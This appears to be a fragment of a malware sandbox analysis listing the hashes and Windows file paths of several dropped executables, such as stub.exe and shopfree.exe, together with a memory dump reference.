SHA512 763b2f03a8264bab2f64b99b573d1224537bfb345dfd88da48699f7f42d55dd74ac34272e64f49c20c4534b908f1a1d6e6e9674464bc2e0f33f0ac2f56919d60

C:\Users\Admin\AppData\Local\Temp\Files\file.exe

MD5 af2379cc4d607a45ac44d62135fb7015
SHA1 39b6d40906c7f7f080e6befa93324dddadcbd9fa
SHA256 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
SHA512 69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

C:\Windows\SysWOW64\Files\shopfree.exe

MD5 a3881dfafe2384ee33c8afb5eeda3321
SHA1 7e212f0a0b97de88ed97976cd57f18e13a3ff8b6
SHA256 d76391b6dca2b5057a0adfb446cf6f80e9be5ec4241cfeddff6e1ca03b331a72
SHA512 4941b98b27b024e94cb83b804ac184bd6c35b1aefab0351dc9f173bc3510910a05b16949e5b9610c72a622740cb5dc46840a2924db7a994046c982430865b037

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe

MD5 ae143811f815882e5ca0b868e84fb9e1
SHA1 f1df23aca2124eb9e218d3219c33eeffb0db9160
SHA256 10c88c29962ac4bd80a62152c72897726f5d193dca1fa932b4339f417c78961d
SHA512 6ea1c925a3bd1f8bf5e7670e5df6c6b837bab5dfe6c53d59c1a6f1634b6eb8d5c41ca32fd147deb93d5f7fae65c77cdbea7590086b010de5bcc5dc2f981bef4c

memory/5548-5693-0x0000000000D40000-0x0000000000DC8000-memory.dmp